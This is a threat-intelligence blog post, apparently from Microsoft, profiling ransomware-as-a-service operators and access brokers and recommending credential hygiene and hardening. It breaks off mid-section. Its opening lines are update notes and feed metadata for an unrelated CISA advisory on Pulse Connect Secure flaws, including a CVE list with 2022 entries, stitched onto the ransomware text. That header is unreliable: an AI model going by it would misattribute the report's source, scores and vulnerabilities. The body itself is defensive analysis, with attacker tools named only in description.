 * May 27, 2021: Added additional technical details and Appendix B
 * July 21, 2021: Added update note directing reader to review new Malware Analysis Reports
 * August 3, 2021: Added bulleted list of July 21 MARs
 * August 11, 2021: Added Ivanti Security Update Information
 * August 24, 2021: Added new Malware Analysis Reports

Record metadata (from the source feed): id AA21-110A; title "Exploitation of Pulse Connect Secure Vulnerabilities"; type ics; published 2021-08-24T12:00:00; modified 2021-08-24T12:00:00; CVSS v3.1 base score 10.0, CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H); CVSS v2 base score 9.0, HIGH (AV:N/AC:L/Au:S/C:C/I:C/A:C); CVE list: CVE-2019-11510, CVE-2020-8243, CVE-2020-8260, CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900, CVE-2021-22984, CVE-2022-42475, CVE-2022-47966; href <https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-110a>.

Source record: mssecure (last seen 2022-05-09T15:51:15).

Microsoft processes 24 trillion signals every 24 hours, and we have blocked billions of attacks in the last year alone.
Microsoft Security tracks more than 35 unique ransomware families and 250 unique threat actors across observed nation-state, ransomware, and criminal activities.

That depth of signal intelligence gathered from various domains—identity, email, data, and cloud—provides us with insight into the gig economy that attackers have created with tools designed to lower the barrier for entry for other attackers, who in turn continue to pay dividends and fund operations through the sale and associated “cut” from their tool’s success.

The cybercriminal economy is a continuously evolving connected ecosystem of many players with different techniques, goals, and skillsets. In the same way our traditional economy has shifted toward gig workers for efficiency, criminals are learning that there’s less work and less risk involved in renting or selling their tools for a portion of the profits than in performing the attacks themselves. This industrialization of the cybercrime economy has made it easier for attackers to use ready-made penetration testing and other tools to perform their attacks.

Within this category of threats, Microsoft has been tracking the trend in the ransomware-as-a-service (RaaS) gig economy, called [human-operated ransomware](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>), which remains one of the most impactful threats to organizations. We coined the industry term “human-operated ransomware” to clarify that these threats are driven by humans who make decisions at every stage of their attacks based on what they find in their target’s network.

Unlike the broad targeting and opportunistic approach of earlier ransomware infections, attackers behind these human-operated campaigns vary their attack patterns depending on their discoveries—for example, a security product that isn’t configured to prevent tampering or a service that’s running as a highly privileged account like a domain admin. Attackers can use those weaknesses to elevate their privileges to steal even more valuable data, leading to a bigger payout for them—with no guarantee they’ll leave their target environment once they’ve been paid. Attackers are also often more determined to stay on a network once they gain access and sometimes repeatedly monetize that access with additional attacks using different malware or ransomware payloads if they aren’t successfully evicted.

Ransomware attacks have become even more impactful in recent years as more ransomware-as-a-service ecosystems have adopted the double extortion monetization strategy. All ransomware is a form of extortion, but now, attackers are not only encrypting data on compromised devices but also exfiltrating it and then posting or threatening to post it publicly to pressure the targets into paying the ransom. Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to, and some even purchase access to networks from other cybercriminals. Some attackers prioritize organizations with higher revenues, while others prefer specific industries for the shock value or type of data they can exfiltrate.

All human-operated ransomware campaigns—all human-operated attacks in general, for that matter—share common dependencies on security weaknesses that allow them to succeed. Attackers most commonly take advantage of **an organization’s poor credential hygiene and legacy configurations or misconfigurations to find easy entry and privilege escalation points in an environment.**

In this blog, we detail several of the ransomware ecosystems using the RaaS model, the importance of cross-domain visibility in finding and evicting these actors, and best practices organizations can use to protect themselves from this increasingly popular style of attack. We also offer security best practices on credential hygiene and cloud hardening, how to address security blind spots, how to harden internet-facing assets to understand your perimeter, and more. Here’s a quick table of contents:

 1. **How RaaS redefines our understanding of ransomware incidents**
   * The RaaS affiliate model explained
   * Access for sale and mercurial targeting
 2. **“Human-operated” means human decisions**
   * Exfiltration and double extortion
   * Persistent and sneaky access methods
 3. **Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks**
 4. **Defending against ransomware: Moving beyond protection by detection**
   * Building credential hygiene
   * Auditing credential exposure
   * Prioritizing deployment of Active Directory updates
   * Cloud hardening
   * Addressing security blind spots
   * Reducing the attack surface
   * Hardening internet-facing assets and understanding your perimeter

## How RaaS redefines our understanding of ransomware incidents

With ransomware being the preferred method for many cybercriminals to monetize attacks, human-operated ransomware remains one of the most impactful threats to organizations today, and it only continues to evolve. This evolution is driven by the “human-operated” aspect of these attacks—attackers make informed and calculated decisions, resulting in varied attack patterns tailored specifically to their targets and iterated upon until the attackers are successful or evicted.

In the past, we’ve observed a tight relationship between the initial entry vector, tools, and ransomware payload choices in each campaign of one strain of ransomware. The RaaS affiliate model, which has allowed more criminals, regardless of technical expertise, to deploy ransomware built or managed by someone else, is weakening this link. As ransomware deployment becomes a gig economy, it has become more difficult to link the tradecraft used in a specific attack to the ransomware payload developers.

Reporting a ransomware incident by assigning it the payload name gives the impression that a monolithic entity is behind all attacks using the same ransomware payload and that all incidents that use the ransomware share common techniques and infrastructure. However, focusing solely on the ransomware stage obscures many stages of the attack that come before, including actions like data exfiltration and additional persistence mechanisms, as well as the numerous detection and protection opportunities for network defenders.

We know, for example, that the underlying techniques used in human-operated ransomware campaigns haven’t changed very much over the years—attacks still prey on the same security misconfigurations to succeed. Securing a large corporate network takes disciplined and sustained focus, but there’s a high ROI in implementing critical controls that prevent these attacks from having a wider impact, even if it’s only possible on the most critical assets and segments of the network.

Without the ability to steal access to highly privileged accounts, attackers can’t move laterally, spread ransomware widely, access data to exfiltrate, or use tools like Group Policy to impact security settings. Disrupting common attack patterns by applying security controls also reduces alert fatigue in SOCs by stopping the attackers before they get in. This can also prevent unexpected consequences of short-lived breaches, such as exfiltration of network topologies and configuration data that happens in the first few minutes of execution of some trojans.

In the following sections, we explain the RaaS affiliate model and disambiguate between the attacker tools and the various threat actors at play during a security incident. Gaining this clarity helps surface trends and common attack patterns that inform defensive strategies focused on preventing attacks rather than detecting ransomware payloads. Threat intelligence and insights from this research also enrich our solutions like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), whose comprehensive security capabilities help protect customers by detecting RaaS-related attack attempts.

### The RaaS affiliate model explained

The cybercriminal economy—a connected ecosystem of many players with different techniques, goals, and skillsets—is evolving. The industrialization of attacks has progressed from attackers using off-the-shelf tools, such as Cobalt Strike, to attackers being able to purchase access to networks and the payloads they deploy to them. This means that the impact of a successful ransomware and extortion attack remains the same regardless of the attacker’s skills.

RaaS is an arrangement between an operator and an affiliate.
The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. The RaaS program may also include a leak site to share snippets of data exfiltrated from victims, allowing attackers to show that the exfiltration is real and try to extort payment. Many RaaS programs further incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure, and cryptocurrency transaction services\n\nRaaS thus gives a unified appearance of the payload or campaign being a single ransomware family or set of attackers. However, what happens is that the RaaS operator sells access to the ransom payload and decryptor to an affiliate, who performs the intrusion and privilege escalation and who is responsible for the deployment of the actual ransomware payload. The parties then split the profit. In addition, RaaS developers and operators might also use the payload for profit, sell it, and run their campaigns with other ransomware payloads\u2014further muddying the waters when it comes to tracking the criminals behind these actions.\n\nFigure 1. How the RaaS affiliate model enables ransomware attacks\n\n### Access for sale and mercurial targeting\n\nA component of the cybercriminal economy is selling access to systems to other attackers for various purposes, including ransomware. Access brokers can, for instance, infect systems with malware or a botnet and then sell them as a \u201cload\u201d. A load is designed to install other malware or backdoors onto the infected systems for other criminals. Other access brokers scan the internet for vulnerable systems, like exposed Remote Desktop Protocol (RDP) systems with weak passwords or unpatched systems, and then compromise them _en masse_ to \u201cbank\u201d for later profit. 
Some advertisements for the sale of initial access fetch higher prices by specifically citing that a system isn’t managed by an antivirus or endpoint detection and response (EDR) product and has a highly privileged credential, such as Domain Administrator, associated with it.

Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to. Some attackers prioritize organizations with higher revenues, while some target specific industries for the shock value or the type of data they can exfiltrate (for example, attackers targeting hospitals or exfiltrating data from technology companies). In many cases, the targeting doesn’t manifest as a specific attack on the target’s network; instead, access is purchased from an access broker, or an existing malware infection is used to pivot to ransomware activities.

In some ransomware attacks, the affiliates who bought a load or access may not even know or care how the system was compromised in the first place and are just using it as a “jump server” to perform other actions in a network. Access brokers often list the network details for the access they are selling, but affiliates aren’t usually interested in the network itself but rather in the monetization potential. As a result, some attacks that seem targeted at a specific industry might simply be a case of affiliates purchasing access based on the number of systems they could deploy ransomware to and the perceived potential for profit.

## “Human-operated” means human decisions

Microsoft coined the term “human-operated ransomware” to clearly define a class of attacks driven by expert human intelligence at every step of the attack chain that culminate in intentional business disruption and extortion.
Human-operated ransomware attacks share commonalities in the security misconfigurations they take advantage of and the manual techniques used for lateral movement and persistence. However, the human-operated nature of these actions means that variations in attacks—including objectives and pre-ransom activity—evolve depending on the environment and the unique opportunities identified by the attackers.

These attacks involve many reconnaissance activities that enable human operators to profile the organization and decide what next steps to take based on specific knowledge of the target. Many of the initial access campaigns that provide access to RaaS affiliates perform automated reconnaissance and exfiltration of information collected in the first few minutes of an attack.

After the attack shifts to a hands-on-keyboard phase, the reconnaissance and the activities based on this knowledge can vary, depending on the tools that come with the RaaS and the operator’s skill. Frequently, attackers query for the currently running security tools, privileged users, and security settings such as those defined in Group Policy before continuing their attack. The data discovered via this reconnaissance phase informs the attacker’s next steps.

If there’s minimal security hardening to complicate the attack and a highly privileged account can be gained immediately, attackers move directly to deploying ransomware by editing a Group Policy. The attackers take note of security products in the environment and attempt to tamper with and disable these, sometimes using scripts or tools provided with the RaaS purchase that try to disable multiple security products at once, other times using specific commands or techniques performed by the attacker.

This human decision-making early in the reconnaissance and intrusion stages means that even if a target’s security solutions detect specific techniques of an attack, the attackers may not get fully evicted from the network and can use other collected knowledge to attempt to continue the attack in ways that bypass security controls. In many instances, attackers test their attacks “in production” from an undetected location in their target’s environment, deploying tools or payloads like commodity malware. If these tools or payloads are detected and blocked by an antivirus product, the attackers simply grab a different tool, modify their payload, or tamper with the security products they encounter. Such detections could give SOCs a false sense of security that their existing solutions are working. However, these could merely serve as a smokescreen that allows the attackers to further tailor an attack chain with a higher probability of success. Thus, by the time the attack reaches the active stage of deleting backups or shadow copies, it would be minutes away from ransomware deployment, and the adversary would likely have already performed harmful actions like the exfiltration of data. This knowledge is key for SOCs responding to ransomware: prioritizing investigation of alerts or detections of tools like Cobalt Strike and performing swift remediation actions and incident response (IR) procedures are critical for containing a human adversary before the ransomware deployment stage.

### Exfiltration and double extortion

Ransomware attackers often profit simply by disabling access to critical systems and causing system downtime. Although that simple technique often motivates victims to pay, it is not the only way attackers can monetize their access to compromised networks.
Exfiltration of data and “double extortion,” which refers to attackers threatening to leak data if a ransom hasn’t been paid, have also become a common tactic among many RaaS affiliate programs—many of them offering a unified leak site for their affiliates. Attackers take advantage of common weaknesses to exfiltrate data and demand ransom without deploying a payload.

This trend means that focusing on protecting against ransomware payloads via security products or encryption, or considering backups as the main defense against ransomware, instead of comprehensive hardening, leaves a network vulnerable to all the stages of a human-operated ransomware attack that occur before ransomware deployment. This exfiltration can take the form of using tools like Rclone to sync to an external site, setting up email transport rules, or uploading files to cloud services. With double extortion, attackers don’t need to deploy ransomware and cause downtime to extort money. Some attackers have moved beyond the need to deploy ransomware payloads and are shifting straight to extortion models or performing the destructive objectives of their attacks by directly deleting cloud resources. One such extortion attacker is DEV-0537 (also known as LAPSUS$), which is profiled below.

### Persistent and sneaky access methods

Paying the ransom may not reduce the risk to an affected network and potentially only serves to fund cybercriminals. Giving in to the attackers’ demands doesn’t guarantee that attackers ever “pack their bags” and leave a network.
Attackers are more determined to stay on a network once they gain access and sometimes repeatedly monetize attacks using different malware or ransomware payloads if they aren’t successfully evicted.

The handoff between different attackers as transitions in the cybercriminal economy occur means that multiple attackers may retain persistence in a compromised environment using an entirely different set of tools from those used in a ransomware attack. For example, initial access gained by a banking trojan leads to a Cobalt Strike deployment, but the RaaS affiliate that purchased the access may choose to use a less detectable remote access tool such as TeamViewer to maintain persistence on the network and operate their broader series of campaigns. Using legitimate tools and settings to persist, rather than malware implants such as Cobalt Strike, is a popular technique among ransomware attackers to avoid detection and remain resident in a network for longer.

Some of the common enterprise tools and techniques for persistence that Microsoft has observed being used include:

 * AnyDesk
 * Atera Remote Management
 * ngrok.io
 * Remote Manipulator System
 * Splashtop
 * TeamViewer

Another popular technique attackers perform once they attain privileged access is the creation of new backdoor user accounts, whether local or in Active Directory. These newly created accounts can then be added to remote access tools such as a virtual private network (VPN) or Remote Desktop, granting remote access through accounts that appear legitimate on the network. Ransomware attackers have also been observed editing the settings on systems to enable Remote Desktop, reduce the protocol’s security, and add new users to the Remote Desktop Users group.

The time between initial access and a hands-on-keyboard deployment can vary wildly depending on the groups and their workloads or motivations.
Some activity groups can access thousands of potential targets and work through these as their staffing allows, prioritizing based on potential ransom payment over several months. While some activity groups may have access to large and highly resourced companies, they prefer to attack smaller companies for less overall ransom because they can execute the attack within hours or days. In addition, the return on investment is higher from companies that can’t respond to a major incident. Ransoms of tens of millions of dollars receive much attention but take much longer to develop. Many groups prefer to ransom five to 10 smaller targets in a month because the success rate at receiving payment is higher in these targets. Smaller organizations that can’t afford an IR team are often more likely to pay tens of thousands of dollars in ransom than an organization worth millions of dollars, because the latter has a developed IR capability and is likely to follow legal advice against paying. In some instances, a ransomware-associated threat actor may have an implant on a network and never convert it to ransom activity. In other cases, initial access to full ransom (including handoff from an access broker to a RaaS affiliate) takes less than an hour.

Figure 2. Human-operated ransomware targeting and rate of success, based on a sampling of Microsoft data over six months between 2021 and 2022

The human-driven nature of these attacks and the scale of possible victims under the control of ransomware-associated threat actors underscore the need to take targeted, proactive security measures to harden networks and prevent these attacks in their early stages.

## Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks

For organizations to successfully respond and evict an active attacker, it’s important to understand the active stage of an ongoing attack.
In the early attack stages, such as deploying a banking trojan, common remediation efforts like isolating a system and resetting exposed credentials may be sufficient. As the attack progresses and the attacker performs reconnaissance activities and exfiltration, it’s important to implement an incident response process that scopes the incident to address the impact specifically. Using a threat intelligence-driven methodology for understanding attacks can assist in determining which incidents need additional scoping.

In the next sections, we provide a deep dive into the following prominent ransomware threat actors and their campaigns to increase community understanding of these attacks and enable organizations to better protect themselves:

 * DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today
 * ELBRUS: (Un)arrested development
 * DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs
 * DEV-0237: Prolific collaborator
 * DEV-0206 and DEV-0243: An “evil” partnership
 * DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate
 * DEV-0537: From extortion to destruction

Microsoft threat intelligence directly informs our products as part of our commitment to track adversaries and protect customers. Microsoft 365 Defender customers should prioritize alerts titled “Ransomware-linked emerging threat activity group detected”. We also add the note “Ongoing hands-on-keyboard attack” to alerts that indicate a human attacker is in the network. When these alerts are raised, it’s highly recommended to initiate an incident response process to scope the attack, isolate systems, and regain control of credentials attackers may be in control of.

A note on threat actor naming: as part of Microsoft’s ongoing commitment to track both nation-state and cybercriminal threat actors, we refer to the unidentified threat actors as a “development group”.
We use a naming structure with a prefix of “DEV” to indicate an emerging threat group or unique activity during investigation. When a nation-state group moves out of the DEV stage, we use chemical elements (for example, PHOSPHOROUS and NOBELIUM) to name them. On the other hand, we use volcano names (such as ELBRUS) for ransomware or cybercriminal activity groups that have moved out of the DEV stage. In the cybercriminal economy, relationships between groups change very rapidly. Attackers are known to hire talent from other cybercriminal groups or use “contractors,” who provide gig economy-style work on a limited-time basis and may not rejoin the group. This shifting nature means that many of the groups Microsoft tracks are labeled as DEV, even if we have a concrete understanding of the nature of the activity group.

### DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today

A vast amount of the current cybercriminal economy connects to a nexus of activity that Microsoft tracks as DEV-0193, also referred to as Trickbot LLC. DEV-0193 is responsible for developing, distributing, and managing many different payloads, including Trickbot, BazaLoader, and AnchorDNS. In addition, DEV-0193 managed the Ryuk RaaS program before the latter’s shutdown in June 2021, as well as Ryuk’s successor Conti and Diavol. Microsoft has been tracking the activities of DEV-0193 since October 2020 and has observed their expansion from developing and distributing the Trickbot malware to becoming the most prolific ransomware-associated cybercriminal activity group active today.

DEV-0193’s actions and use of the cybercriminal gig economy mean they often add new members and projects and utilize contractors to perform various parts of their intrusions. As other malware operations have shut down for various reasons, including legal actions, DEV-0193 has hired developers from these groups.
Most notable are the acquisitions of developers from Emotet, Qakbot, and IcedID, bringing them under the DEV-0193 umbrella.

A subgroup of DEV-0193, which Microsoft tracks as DEV-0365, provides infrastructure-as-a-service for cybercriminals. Most notably, DEV-0365 provides Cobalt Strike Beacon-as-a-service. These DEV-0365 Beacons have replaced unique C2 infrastructure in many active malware campaigns. DEV-0193 infrastructure has also been [implicated](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in attacks deploying novel techniques, including exploitation of CVE-2021-40444.

The leaked chat files from a group publicly labeled as the “Conti Group” in February 2022 confirm the wide scale of DEV-0193 activity tracked by Microsoft. Based on our telemetry from 2021 and 2022, Conti has become one of the most deployed RaaS ecosystems, with multiple affiliates concurrently deploying their payload—even as other RaaS ecosystems (DarkSide/BlackMatter and REvil) ceased operations. However, payload-based attribution meant that much of the activity that led to Conti ransomware deployment was attributed to the “Conti Group,” even though many affiliates had wildly different tradecraft, skills, and reporting structures. Some Conti affiliates performed small-scale intrusions using the tools offered by the RaaS, while others performed weeks-long operations involving data exfiltration and extortion using their own techniques and tools. One of the most prolific and successful Conti affiliates—and the one responsible for developing the “Conti Manual” leaked in August 2021—is tracked as DEV-0230.
This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193’s BazaLoader infrastructure.

### ELBRUS: (Un)arrested development

ELBRUS, also known as FIN7, has been known to be in operation since 2012 and has run multiple campaigns targeting a broad set of industries for financial gain. ELBRUS has deployed point-of-sale (PoS) and ATM malware to collect payment card information from in-store checkout terminals. They have also targeted corporate personnel who have access to sensitive financial data, including individuals involved in SEC filings.

In 2018, this activity group made headlines when [three of its members were arrested](<https://www.justice.gov/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100>). In May 2020, another arrest was made of an individual with alleged involvement with ELBRUS. However, despite law enforcement actions against suspected individual members, Microsoft has observed sustained campaigns from the ELBRUS group itself during these periods.

ELBRUS is responsible for developing and distributing multiple custom malware families used for persistence, including JSSLoader and Griffon. ELBRUS has also created fake security companies called “Combi Security” and “Bastion Security” to facilitate the recruitment of employees to their operations under the pretense of working as penetration testers.

In 2020, ELBRUS transitioned from using PoS malware to deploying ransomware as part of a financially motivated extortion scheme, specifically deploying the MAZE and REvil RaaS families. ELBRUS developed their own RaaS ecosystem named DarkSide. They deployed DarkSide payloads as part of their operations and recruited and managed affiliates that deployed the DarkSide ransomware.
The tendency to report on ransomware incidents based on payload and attribute them to a monolithic gang often obfuscates the true relationship between the attackers, which is especially true of the DarkSide RaaS. Case in point: one of the most infamous DarkSide deployments wasn’t performed by ELBRUS but by a ransomware-as-a-service affiliate Microsoft tracks as DEV-0289.

ELBRUS retired the DarkSide ransomware ecosystem in May 2021 and released its successor, BlackMatter, in July 2021. Replicating their patterns from DarkSide, ELBRUS deployed BlackMatter themselves and ran a RaaS program for affiliates. The activity group then retired the BlackMatter ransomware ecosystem in November 2021.

While they aren’t currently publicly observed to be running a RaaS program, ELBRUS is very active in compromising organizations via phishing campaigns that lead to their JSSLoader and Griffon malware. Since 2019, ELBRUS has partnered with DEV-0324 to distribute their malware implants. DEV-0324 acts as a distributor in the cybercriminal economy, providing a service to distribute the payloads of other attackers through phishing and exploit kit vectors. In April 2022, ELBRUS has also been abusing CVE-2021-31207 in Exchange to compromise organizations, an interesting pivot to using a less popular authenticated vulnerability in the ProxyShell cluster of vulnerabilities. This abuse has allowed them to target organizations that patched only the unauthenticated vulnerability in their Exchange Server and turn compromised low-privileged user credentials into highly privileged access as SYSTEM on an Exchange Server.

### DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs

An excellent example of how clustering activity based on ransomware payload alone can obfuscate the threat actors behind the attack is DEV-0504.
DEV-0504 has deployed at least six RaaS payloads since 2020, with many of their attacks becoming high-profile incidents attributed to the “REvil gang” or “BlackCat ransomware group”. This attribution masks the actions of the set of attackers under the DEV-0504 umbrella, including other REvil and BlackCat affiliates. This has resulted in a confusing story of the scale of the ransomware problem and overinflated the impact that a single RaaS program shutdown can have on the threat environment.

Figure 3. Ransomware payloads distributed by DEV-0504 between 2020 and April 2022

DEV-0504 shifts payloads when a RaaS program shuts down, for example, the deprecation of REvil and BlackMatter, or possibly when a program with a better profit margin appears. These market dynamics aren’t unique to DEV-0504 and are reflected in most RaaS affiliates. They can also manifest in even more extreme behavior where RaaS affiliates switch to older “fully owned” ransomware payloads like Phobos, which they can buy when a RaaS isn’t available or when they don’t want to pay the fees associated with RaaS programs.

DEV-0504 appears to rely on access brokers to enter a network, using Cobalt Strike Beacons they have possibly purchased access to. Once inside a network, they rely heavily on PsExec to move laterally and stage their payloads. Their techniques require them to have compromised elevated credentials, and they frequently disable antivirus products that aren’t protected with tamper protection.

DEV-0504 was responsible for deploying BlackCat ransomware in companies in the energy sector in January 2022.
Around the same time, DEV-0504 also deployed BlackCat in attacks against companies in the fashion, tobacco, IT, and manufacturing industries, among others.

### DEV-0237: Prolific collaborator

Like DEV-0504, DEV-0237 is a prolific RaaS affiliate that alternates between different payloads in their operations based on what is available. DEV-0237 heavily used Ryuk and Conti payloads from Trickbot LLC/DEV-0193, then Hive payloads more recently. Many publicly documented Ryuk and Conti incidents and tradecraft can be traced back to DEV-0237.

After the activity group switched to Hive as a payload, a large uptick in Hive incidents was observed. Their switch to the BlackCat RaaS in March 2022 is suspected to be due to [public discourse](<https://www.securityweek.com/researchers-devise-method-decrypt-hive-ransomware-encrypted-data>) around Hive decryption methodologies; that is, DEV-0237 may have switched to BlackCat because they didn’t want Hive’s decryptors to interrupt their business. Overlap in payloads has occurred as DEV-0237 experiments with new RaaS programs on lower-value targets. They have been observed to experiment with some payloads only to abandon them later.

_Figure 4. Ransomware payloads distributed by DEV-0237 between 2020 and April 2022_

Beyond RaaS payloads, DEV-0237 also uses the cybercriminal gig economy to gain initial access to networks. DEV-0237’s proliferation and success rate come in part from their willingness to leverage the network intrusion work and malware implants of other groups rather than performing their own initial compromise and malware development.

Figure 5. Examples of DEV-0237’s relationships with other cybercriminal activity groups

Like all RaaS operators, DEV-0237 relies on compromised, highly privileged account credentials and security weaknesses once inside a network.
DEV-0237 often leverages the Cobalt Strike Beacon dropped by the malware they have purchased, as well as tools like SharpHound to conduct reconnaissance. The group often utilizes `bitsadmin /transfer` to stage their payloads. An often-documented trademark of Ryuk and Conti deployments is naming the ransomware payload _xxx.exe_, a tradition that DEV-0237 continues to use no matter what RaaS they are deploying, as most recently observed with BlackCat. In late March 2022, DEV-0237 was observed to be using a new version of Hive again.

### DEV-0206 and DEV-0243: An “evil” partnership

Malvertising, which refers to taking out a search engine ad that leads to a malware payload, has been used in many campaigns, but the access broker that Microsoft tracks as DEV-0206 uses this as their primary technique to gain access to and profile networks. Targets are lured by an ad purporting to be a browser update or a software package to download a ZIP file and double-click it. The ZIP package contains a JavaScript file (.js), which in most environments runs when double-clicked. Organizations that have changed the settings such that script files open with a text editor by default instead of a script handler are largely immune from this threat, even if a user double-clicks the script.

Once successfully executed, the JavaScript framework, also referred to as [SocGholish](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us>), acts as a loader for other malware campaigns that use access purchased from DEV-0206, most commonly Cobalt Strike payloads. These payloads have, in numerous instances, led to custom Cobalt Strike loaders attributed to DEV-0243.
DEV-0243 falls under activities tracked by the cyber intelligence industry as “EvilCorp.” The custom Cobalt Strike loaders are similar to those seen in the publicly documented [Blister](<https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign>) malware’s inner payloads. In DEV-0243’s initial partnerships with DEV-0206, the group deployed a custom ransomware payload known as WastedLocker, and then expanded to additional DEV-0243 ransomware payloads developed in-house, such as PhoenixLocker and Macaw.

Around November 2021, DEV-0243 started to deploy the LockBit 2.0 RaaS payload in their intrusions. The use of a RaaS payload by the “EvilCorp” activity group is likely an attempt by DEV-0243 to avoid attribution to their group, which could discourage payment due to their sanctioned status.

Figure 6. The handover from DEV-0206 to DEV-0243

### DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate

Differing from the other RaaS developers, affiliates, and access brokers profiled here, DEV-0401 appears to be an activity group involved in all stages of their attack lifecycle, from initial access to ransomware development. Despite this, they seem to take some inspiration from successful RaaS operations with the frequent rebranding of their ransomware payloads. Unique among human-operated ransomware threat actors tracked by Microsoft, DEV-0401 [is confirmed to be a China-based activity group.](<https://twitter.com/MsftSecIntel/status/1480730559739359233>)

DEV-0401 differs from many of the attackers who rely on purchasing access to existing malware implants or exposed RDP to enter a network. Instead, the group heavily utilizes unpatched vulnerabilities to access networks, including vulnerabilities in Exchange, Manage Engine AdSelfService Plus, Confluence, and [Log4j 2](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).
Due to the nature of the vulnerabilities they prefer, DEV-0401 gains elevated credentials at the initial access stage of their attack.

Once inside a network, DEV-0401 relies on standard techniques such as using Cobalt Strike and WMI for lateral movement, but they have some unique preferences for implementing these behaviors. Their Cobalt Strike Beacons are frequently launched via DLL search order hijacking. While they use the common Impacket tool for WMI lateral movement, they use a customized version of the tool’s _wmiexec.py_ module that creates renamed output files, most likely to evade static detections. Ransomware deployment is ultimately performed from a batch file in a share and Group Policy, usually written to the NETLOGON share on a Domain Controller, which requires the attackers to have obtained highly privileged credentials like Domain Administrator to perform this action.

Figure 7. Ransomware payloads distributed by DEV-0401 between 2021 and April 2022

Because DEV-0401 maintains and frequently rebrands their own ransomware payloads, they can appear as different groups in payload-driven reporting and evade detections and actions against them. Their payloads are sometimes rebuilt from existing for-purchase ransomware tools like Rook, which shares code similarity with the Babuk ransomware family. In February 2022, DEV-0401 was observed deploying the Pandora ransomware family, primarily via unpatched VMware Horizon systems vulnerable to the [Log4j 2 CVE-2021-44228 vulnerability](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).

Like many RaaS operators, DEV-0401 maintained a leak site to post exfiltrated data and motivate victims to pay; however, their frequent rebranding caused these systems to sometimes be unready for their victims, with their leak site sometimes leading to default web server landing pages when victims attempted to pay.
In a notable shift—possibly related to victim payment issues—DEV-0401 started deploying LockBit 2.0 ransomware payloads in April 2022.

### DEV-0537: From extortion to destruction

An example of a threat actor who has moved to a pure extortion and destruction model without deploying ransomware payloads is an activity group that Microsoft tracks as DEV-0537, also known as LAPSUS$. Microsoft has detailed DEV-0537 actions taken in early 2022 [in this blog](<https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/>). DEV-0537 started targeting organizations mainly in Latin America but expanded to global targeting, including government entities, technology, telecom, retailers, and healthcare. Unlike more opportunistic attackers, DEV-0537 targets specific companies with intent. Their initial access techniques include exploiting unpatched vulnerabilities in internet-facing systems, searching public code repositories for credentials, and taking advantage of weak passwords. In addition, there is evidence that DEV-0537 leverages credentials stolen by the Redline password stealer, a piece of malware available for purchase in the cybercriminal economy. The group also buys credentials from underground forums that were gathered by other password-stealing malware.

Once initial access to a network is gained, DEV-0537 takes advantage of security misconfigurations to elevate privileges and move laterally to meet their objectives of data exfiltration and extortion. While DEV-0537 doesn’t possess any unique technical capabilities, the group is especially cloud-aware. They target cloud administrator accounts to set up forwarding rules for email exfiltration and tamper with administrative settings on cloud environments. As part of their goal of forcing payment of ransom, DEV-0537 attempts to delete all server infrastructure and data to cause business disruption.
To further facilitate the achievement of their goals, they remove legitimate admins and delete cloud resources and server infrastructure, resulting in destructive attacks.

DEV-0537 also takes advantage of cloud admin privileges to monitor email, chats, and VOIP communications to track incident response efforts to their intrusions. DEV-0537 has been observed on multiple occasions to join incident response calls, not just observing the response to inform their attack but unmuting to demand ransom and sharing their screens while they delete their victim’s data and resources.

## Defending against ransomware: Moving beyond protection by detection

A durable security strategy against determined human adversaries must include the goal of mitigating classes of attacks as well as detecting them. Ransomware attacks generate multiple, disparate security product alerts, but these can easily get lost or not be responded to in time. Alert fatigue is real, and SOCs can make their lives easier by looking at trends in their alerts or grouping alerts into incidents so they can see the bigger picture. SOCs can then mitigate alerts using hardening capabilities like attack surface reduction rules. Hardening against common threats can reduce alert volume and stop many attackers before they get access to networks.

Attackers tweak their techniques and have tools to evade and disable security products. They are also well-versed in system administration and try to blend in as much as possible. However, while attacks have continued steadily and with increased impact, the attack techniques attackers use haven’t changed much over the years. Therefore, a renewed focus on prevention is needed to curb the tide.

Ransomware attackers are motivated by easy profits, so adding to their cost via security hardening is key to disrupting the cybercriminal economy.

### Building credential hygiene

More than malware, attackers need credentials to succeed in their attacks.
In almost all attacks where ransomware deployment was successful, the attackers had access to a domain admin-level account or local administrator passwords that were consistent throughout the environment. Deployment can then be done through Group Policy or tools like PsExec (or clones like PAExec, CSExec, and WinExeSvc). Without the credentials to provide administrative access in a network, spreading ransomware to multiple systems is a bigger challenge for attackers. Compromised credentials are so important to these attacks that when cybercriminals sell ill-gotten access to a network, in many instances, the price includes a guaranteed administrator account to start with.

Credential theft is a common attack pattern. Many administrators know tools like Mimikatz and LaZagne and their capabilities to steal passwords from interactive logons in the LSASS process. Detections exist for these tools accessing the LSASS process in most security products. However, the risk of credential exposure isn’t limited to a domain administrator logging in interactively to a workstation. Because attackers have accessed and explored many networks during their attacks, they have a deep knowledge of common network configurations and use it to their advantage. One common misconfiguration they exploit is running services and scheduled tasks as highly privileged service accounts.

